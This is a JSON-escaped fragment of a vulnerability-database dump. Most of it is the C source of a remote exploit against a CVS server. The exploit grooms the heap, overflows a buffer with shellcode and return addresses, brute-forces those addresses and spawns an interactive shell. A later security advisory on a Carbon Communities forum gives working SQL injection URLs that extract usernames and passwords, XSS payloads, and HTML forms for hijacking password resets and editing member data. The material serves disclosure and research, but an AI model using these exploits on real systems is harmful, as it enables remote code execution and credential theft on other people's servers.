\"\\n\");\r\n\r\nstr[term] = 0;\r\n\r\nwrite(s, str, size);\r\nfree(str);\r\n\r\nreturn(0);\r\n}\r\n\r\nint normalize_heap(int sockfd)\r\n{\r\nint i;\r\nchar buff[8192 + 128];\r\n\r\nmemset(buff, 0x0, 8192 + 128);\r\nmemset(buff, 0x62, 8190);\r\nmemcpy(buff, \"Argument \", 9);\r\nstrcat(buff, \"\\n\"); \r\nbuff[72] = 0;\r\n\r\nfor( i = 0 ; i < 128 ; i++)\r\n{\r\nwrite(sockfd, buff, 8191);\r\n} \r\n\r\nmemset(buff, 0x0, 8192 + 128);\r\nmemset(buff, 0x62, 8190);\r\nmemcpy(buff, \"Argument \", 9); \r\nstrcat(buff, \"\\n\");\r\nbuff[65] = 0; \r\n\r\nfor(i = 0 ; i < 64 ; i++)\r\n{\r\nwrite(sockfd, buff, 8191);\r\n}\r\n\r\nmemset(buff, 0x0, 8192 + 128);\r\n memset(buff, 0x62, 8190);\r\n memcpy(buff, \"Argument \", 9);\r\n strcat(buff, \"\\n\"); \r\nbuff[44] = 0;\r\n\r\nfor(i = 0 ; i < 32 ; i++)\r\n{\r\nwrite(sockfd, buff, 8191);\r\n}\r\nmemset(buff, 0x0, 8192 + 128);\r\n memset(buff, 0xff, 8193);\r\n memcpy(buff, \"Argument \", 9);\r\n strcat(buff, \"\\n\"); \r\n\r\nwrite(sockfd, buff, 8194);\r\n}\r\n\r\nint correctly_fill_hole(int sockfd, int fill)\r\n{\r\nint chunk_size, chunk_size2;\r\nint num_chunks;\r\nint leftover, i = 0;\r\nchar buf[256];\r\nchar pad[1024];\r\nchar buff[2048];\r\nunsigned long addr = RET;\r\nchar addrbuf[4096];\r\n\r\nchunk_size = (1024 + word_size);\r\nnum_chunks = (fill / chunk_size);\r\nleftover = (fill % chunk_size);\r\n\r\nmemset(pad, 0x0, 1024);\r\nmemset(pad, 0x88, ((1024 - 8) / 2));\r\nmemset(buff, 0x0, 2048);\r\n\r\n /* The exploit will almost certainly fail if leftover == 0\r\n * however in theory this should never actually happen.\r\n */\r\nif(leftover == 0)\r\n{\r\nfor(i = 0; i < num_chunks && fill > 0; i++)\r\n{\r\n do_sized_entry(sockfd, pad, pad, fill - (1024 + word_size));\r\n fill -= (1024 + word_size);\r\n}\r\n}\r\nelse\r\n{\r\nfor(i = 0; i < (num_chunks -2) && fill > 0; i++)\r\n{\r\n do_sized_entry(sockfd, pad, pad, fill - (1024 + word_size));\r\n fill -= (1024 + word_size);\r\n}\r\nchunk_size2 = (chunk_size * 2 + leftover); \r\nROUND(chunk_size2);\r\nmemset(buff, 0x0, 2048);\r\nmemset(buff, 0xff, (chunk_size2 - 8) / 2);\r\nmemset(addrbuf, 0x0, sizeof(addrbuf)); \r\nfor(i = 0 ; i < (((chunk_size2 - 8) / 2) -4) ; i += 4) \r\n *(int *)&addrbuf[i] = htonl(RET);\r\n\r\nmemcpy(buff+1, addrbuf, strlen(addrbuf)); \r\ndo_sized_entry(sockfd, buff, buff, 4096);\r\n}\r\n\r\nmemset(buff, 0x0, 2048);\r\nmemset(buff, 0xff, 34);\r\n\r\nmemset(addrbuf, 0x0, sizeof(addrbuf));\r\nfor(i = 0; i < 28; i+=4)\r\n *(int *)&addrbuf[i] = htonl(RET);\r\n\r\nmemcpy(buff+7, addrbuf, strlen(addrbuf));\r\n\r\ndo_sized_entry(sockfd, buff, buff, 97);\r\n}\r\n\r\nint do_ismodified(int s, char *e1)\r\n{ \r\nchar *str = (char *) malloc(100000);\r\nint x = 0, term = 0;\r\n\r\n bzero(str, 100000);\r\n\r\nsprintf(str,\"Is-modified %s\\n\", e1);\r\n\r\nzwrite(str, strlen(str), s);\r\nzflush(s); \r\n\r\nfree(str);\r\n\r\nreturn 0;\r\n}\r\n\r\nint do_argument(int sockfd)\r\n{\r\nchar *exp;\r\n\r\nexp = (char *) malloc(20000);\r\n\r\nmemset(exp, 0x0, 20000);\r\nmemset(exp, 0x69, 19680 + strlen(\"Argument \"));\r\n\r\nmemcpy(exp, \"Argument \", strlen(\"Argument \"));\r\n\r\nexp[19680 + strlen(\"Argument \")] = '\\n';\r\n\r\nwrite(sockfd, exp, strlen(exp));\r\n\r\nreturn(0);\r\n}\r\n\r\nint do_resize(int sockfd)\r\n{\r\nchar buffer[256];\r\nint x = 0;\r\nmemset(buffer, 0x0, 256);\r\nmemset(buffer, 0xff, 255);\r\n\r\nbuffer[254] = '\\n';\r\n\r\nmemcpy(buffer, \"Argumentx \", strlen(\"Argumentx \"));\r\n\r\nbuffer[74 + 44] = 0;\r\n\r\nzwrite(buffer, 255, sockfd);\r\nzflush(sockfd);\r\n}\r\n\r\nint do_overflow(int sockfd)\r\n{\r\nchar buffer[20000];\r\nint i = 0;\r\n\r\nmemset(buffer, 0x0, 20000);\r\nmemset(buffer, 0x42, 19782);\r\n\r\nfor(i = 0 ; i < 19780-8; i+=4)\r\n *(unsigned int *)&buffer[i] = htonl(retaddr);\r\n \r\nfor(i = 0; i < 19600; i+=4)\r\n *(unsigned int *)&buffer[i] = htonl(NOP); \r\n \r\n memcpy(buffer+19000, shellcode, strlen(shellcode));\r\n\r\nmemcpy(buffer, \"Argument \", strlen(\"Argument \"));\r\nbuffer[19781] = '\\012';\r\n\r\nzwrite(buffer, 19782, sockfd);\r\nzflush(sockfd);\r\n}\r\n\r\nint work_around_zlib_bug(int sockfd)\r\n{\r\nchar buffer[4096];\r\nchar data[64];\r\n\r\nmemset(data, 0x0, 64);\r\nmemset(data, 0x42, 32);\r\n\r\nmemset(buffer, 0x0, 4096);\r\nmemset(buffer, 0x42, 4000);\r\n\r\nsprintf(buffer, \"Entry /%s/%s/\", data, data);\r\n\r\nbuffer[2999] = '\\n';\r\n\r\nzwrite(buffer, 3000, sockfd);\r\nzflush(sockfd);\r\n} \r\n\r\nunsigned char auth_shifts[] ={\r\n 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,\r\n 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,\r\n 114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87,\r\n 111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105,\r\n 41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35,\r\n 125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56,\r\n 36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48,\r\n 58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223,\r\n 225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190,\r\n 199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193,\r\n 174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212,\r\n 207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246,\r\n 192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176,\r\n 227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127,\r\n 182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195,\r\n 243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 };\r\n\r\nchar *scramble(char * str)\r\n{\r\nint i;\r\n char * s;\r\n \r\n s = (char *) malloc (strlen (str) + 3);\r\n memset(s, '\\0', strlen(str) + 3);\r\n *s = 'A';\r\n for (i = 1; str[i - 1]; i++)\r\n s[i] = auth_shifts[(unsigned char)(str[i - 1])];\r\n return (s);\r\n}\r\n\r\nint usage(char *name)\r\n{\r\nprintf(\"usage: %s [options]\\n\", name);\r\n printf(\"Options:\\n\");\r\n printf(\" -t Desired target\\n\");\r\n printf(\" -r CVS root\\n\");\r\n printf(\" -u CVS user\\n\");\r\n printf(\" -p Password\\n\");\r\n printf(\" -h Targeted host\\n\"); \r\n printf(\" -P Port running CVS\\n\"); \r\n \r\n printf(\"\\nAvailable targets:\\n\"); \r\n for (target = 0; serve[target].name != NULL; target++) \r\n printf(\"[%i] - %s\\n\", target, serve[target].name); \r\n exit(0);\r\n}\r\n\r\nint do_shell(int sockfd)\r\n{\r\nwhile(1)\r\n {\r\n fd_set fds;\r\n FD_ZERO(&fds);\r\n FD_SET(0,&fds);\r\n FD_SET(sockfd,&fds);\r\n if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))\r\n {\r\n int cnt;\r\n char buf[1024];\r\n if(FD_ISSET(0,&fds))\r\n {\r\n if((cnt=read(0,buf,1024))<1)\r\n {\r\n if(errno==EWOULDBLOCK||errno==EAGAIN)\r\n continue;\r\n else\r\n break;\r\n }\r\n write(sockfd,buf,cnt);\r\n }\r\n if(FD_ISSET(sockfd,&fds))\r\n {\r\n if((cnt=read(sockfd,buf,1024))<1)\r\n {\r\n if(errno==EWOULDBLOCK||errno==EAGAIN)\r\n continue;\r\n else\r\n break;\r\n }\r\n write(1,buf,cnt);\r\n }\r\n }\r\n } \r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\nint i, sockfd, len, result,x;\r\n char c;\r\nstruct sockaddr_in addr;\r\nstruct hostent *hostinfo;\r\n\r\nif(argc == 1)\r\n{\r\n usage(argv[0]); \r\n }\r\n\r\nport = CVS_PORT; \r\n while((c = getopt(argc, argv, \"t:r:u:d:p:h:\")) != EOF)\r\n { \r\n switch(c) \r\n { \r\n case 't': \r\n target = atoi(optarg); \r\n break; \r\n case 'r': \r\n root = strdup(optarg); \r\n reposit = strdup(optarg); \r\n break; \r\n case 'u': \r\n user = strdup(optarg); \r\n break; \r\n case 'd': \r\n directory = strdup(optarg); \r\n break;\r\n case 'p':\r\n pass = strdup(optarg);\r\n break;\r\n case 'h':\r\n host = strdup(optarg);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n } \r\n}\r\n\r\nhostinfo = gethostbyname(host);\r\nif(!hostinfo)\r\n{\r\nperror(\"gethostbyname()\");\r\nexit(0);\r\n}\r\n\r\nsockfd = socket(AF_INET, SOCK_STREAM, 0);\r\n\r\naddr.sin_family = AF_INET;\r\naddr.sin_port = htons(port);\r\naddr.sin_addr = *(struct in_addr *)*hostinfo -> h_addr_list;\r\nlen = sizeof(addr);\r\n\r\nprintf(\"Attacking %s running %s\\n\", host, serve[target].name);\r\nprintf(\"[\");\r\nfflush(stdout);\r\n\r\nretaddr = serve[target].retadd;\r\n\r\n while(1)\r\n {\r\nsockfd = socket(AF_INET, SOCK_STREAM, 0); \r\nresult = connect(sockfd, (struct sockaddr *)&addr, len);\r\nif(result == -1)\r\n{\r\nperror(\"connect()\");\r\nexit(0);\r\n}\r\n\r\ndo_auth(sockfd);\r\ntimeout_read(sockfd, buf, sizeof(buf)-1, 3); \r\ndo_root(sockfd);\r\n\r\nnormalize_heap(sockfd);\r\n\r\ndo_argument(sockfd);\r\n \r\n fill_size = 19680;\r\n\r\nmemset(entry1, 0x41, 60);\r\nmemset(entry2, 0x42, 60);\r\nmemset(entry3, 0x43, 60);\r\n\r\ndo_sized_entry(sockfd, entry1, entry1, fill_size - (128+word_size) );\r\n fill_size -= (128 + word_size);\r\n do_sized_entry(sockfd, entry2, entry2, fill_size - (128+word_size) );\r\n fill_size -= (128 + word_size);\r\n do_sized_entry(sockfd, entry3, entry3, fill_size - (128+word_size) );\r\n fill_size -= (128 + word_size);\r\n \r\ncorrectly_fill_hole(sockfd, fill_size - (64 + word_size));\r\n \r\ndo_compression(sockfd);\r\n\r\nlen1 = ( 5 + 4 + 16); \r\n len2 = ( 144 + 8 + 5 + 1);\r\nlen3 = ( 144 + 8 + 128 + 8 + 5 + 0);\r\n\r\nfor(i = 0; i < len1; i++)\r\n do_ismodified(sockfd, entry1);\r\n\r\nfor(i = 0; i < len2; i++)\r\n do_ismodified(sockfd, entry2);\r\n\r\nfor(i = 0; i < len3; i++)\r\n do_ismodified(sockfd, entry3);\r\n\r\nwork_around_zlib_bug(sockfd);\r\n\r\ndo_resize(sockfd);\r\n\r\n do_overflow(sockfd);\r\n\r\nprintf(\".\");\r\nfflush(stdout);\r\n\r\nwhile(1)\r\n{\r\n result = timeout_read(sockfd, buf, 4, 5);\r\n if(result == -1 || result == 0)\r\n {\r\nbreak;\r\n }\r\n if(result == -2)\r\n {\r\nprintf(\"\\n Timeout... trying for shell\\n\"); \r\ndo_shell(sockfd);\r\nbreak;\r\n } \r\n/* Maybe use strstr and a larger read buffer here ? */\r\n if(strncmp(buf, \"caca\", 4) == 0)\r\n {\r\nprintf(\"]\\n\");\r\nprintf(\"[+] [email\u00a0protected] With retaddr = 0x%x\\n\", retaddr);\r\ndo_shell(sockfd);\r\nexit(0);\r\n }\r\n}\r\n\r\nchange += 12000;\r\n\r\n if(oflip == 0)\r\n {\r\n retaddr = serve[target].retadd + change;\r\n oflip = 1;\r\n }\r\n else if(oflip == 1)\r\n {\r\n retaddr = serve[target].retadd - change;\r\n oflip = 0;\r\n }\r\n\r\nclose(sockfd);\r\n } \r\n}\r\n\r \n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8399"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.\r\nTrashbin plugin for Wordpress: crossite scripting.", "modified": "2008-04-16T00:00:00", "published": "2008-04-16T00:00:00", "id": "SECURITYVULNS:VULN:8911", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8911", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "description": "########################## www.BugReport.ir #######################################\r\n#\r\n# AmnPardaz Security Research Team\r\n#\r\n# Title: Multiple Vulnerabilities in Carbon Communities forum. \r\n# Vendor: www.carboncommunities.com\r\n# Vulnerable Version: 2.4 and prior versions\r\n# Exploit: Available\r\n# Impact: High\r\n# Fix: N/A\r\n# Original Advisory: http://bugreport.ir/index.php?/35\r\n###################################################################################\r\n\r\n\r\n####################\r\n1. Description:\r\n####################\r\nCarbon Communities is a high powered, fully scalable, and highly customizable online portal, message\r\nboards/ bulletin board, discussion hub, Private messaging, Event Calendars, Emails and chat software\r\nrolled into one.\r\n\r\n####################\r\n2. Vulnerability:\r\n####################\r\n 2.1. There is a SQL Injection in "events.asp?id=[Injection]". By using it, attacker can gain\r\nusernames and passwords.\r\n 2.1.1. POC:\r\n Check exploits section.\r\n 2.2. There is a SQL Injection in "getpassword.asp". By using it, attacker can send any\r\npassword to his/her email address.(exploit available)\r\n 2.2.1. POC:\r\n Check exploits section.\r\n 2.3. There is a SQL Injection in "option_Update.asp". By using it, attacker can update member\r\ninfo.(exploit available)\r\n 2.3.1. POC:\r\n Check exploits section.\r\n 2.4. There are some XSS in "login.asp" and "member_send.asp".\r\n 2.4.1. POC:\r\n /login.asp?Redirect='><script>alert('XSS')</script><fake a='\r\n /member_send.asp?OrderBy='><script>alert('XSS')</script><fake a='\r\n####################\r\n3. Exploits:\r\n####################\r\n \r\n Original Exploit URL: http://bugreport.ir/index.php?/35/exploit\r\n\r\n 3.1. Attacker can gain usernames and passwords:\r\n -------------\r\n http://[CarbonCommunitiesURL]/events.asp?ID=-1 union all select 1,1,1,'Username=\r\n'%2bmember_name%2b'<br>Password= '%2bmember_password,1,1,1,1,1,1,1 from tbl_Members where member_name\r\n= 'admin'\r\n -------------\r\n 3.2. Attacker can send any password to his/her email address:\r\n -------------\r\n <script language="javascript">\r\n function check(){\r\n document.getElementById("UserName").value = "1' or\r\nuCase(Member_Name)='"+ document.getElementById("UserName").value\r\n }\r\n </script>\r\n <form action="http://[CarbonCommunitiesURL]/getpassword.asp" method="post"\r\nonsubmit="check()">\r\n UserName: <input type="text" name="UserName" id="UserName" value="default" size="100"\r\n/>\r\n <br />\r\n EMail: <input type="text" name="EMail" value="Your Email Address" size="100" />\r\n <br />\r\n <input type="submit" />\r\n </form>\r\n -------------\r\n 3.3. Attacker can update member info.:\r\n -------------\r\n <form action="http://[CarbonCommunitiesURL]/option_Update.asp?Action=edit"\r\nmethod="post">\r\n ID<input type="text" name="ID" value="1"/>\r\n <br />\r\n Member_Cookies<input type="text" name="Member_Cookies" value="Yes" />\r\n <br />\r\n Member_SystemCookies<input type="text" name="Member_SystemCookies" value="Yes" />\r\n <br />\r\n Member_Center<input type="text" name="Member_Center" value="1" />\r\n <br />\r\n Member_EmailTheadResponse<input type="text" name="Member_EmailTheadResponse"\r\nvalue="1" />\r\n <br />\r\n Member_EmailPostResponse<input type="text" name="Member_EmailPostResponse" value="1"\r\n/>\r\n <br />\r\n Member_WeekStart<input type="text" name="Member_WeekStart" value="0" />\r\n <br />\r\n Member_ThreadDays<input type="text" name="Member_ThreadDays" value="0" />\r\n <br />\r\n Member_ThreadView<input type="text" name="Member_ThreadView" value="0" />\r\n <br />\r\n Member_Invisible<input type="text" name="Member_Invisible" value="1" />\r\n <br />\r\n Member_HiddenEmail<input type="text" name="Member_HiddenEmail" value="0" />\r\n <br />\r\n Member_ReceivePM<input type="text" name="Member_ReceivePM" value="1" />\r\n <br />\r\n Member_PMEmailNotice<input type="text" name="Member_PMEmailNotice" value="1" />\r\n <br />\r\n Member_PMPopup<input type="text" name="Member_PMPopup" value="1" />\r\n <br />\r\n Member_Newsletter<input type="text" name="Member_Newsletter" value="0" />\r\n <br />\r\n Member_TimeZone<input type="text" name="Member_TimeZone" value="0" />\r\n <br />\r\n Member_DefaultColor<input type="text" name="Member_DefaultColor" value="1" />\r\n <br />\r\n <input type="submit" />\r\n </form>\r\n -------------\r\n####################\r\n4. Solution:\r\n####################\r\n Edit the source code to ensure that inputs are properly sanitised.\r\n####################\r\n- Credit :\r\n####################\r\nAmnPardaz Security Research & Penetration Testing Group\r\nContact: admin[4t}bugreport{d0t]ir\r\nWwW.BugReport.ir\r\nWwW.AmnPardaz.com", "modified": "2008-04-16T00:00:00", "published": "2008-04-16T00:00:00", "id": "SECURITYVULNS:DOC:19680", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19680", "title": "Carbon Communities forum Multiple Vulnerabilities.", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
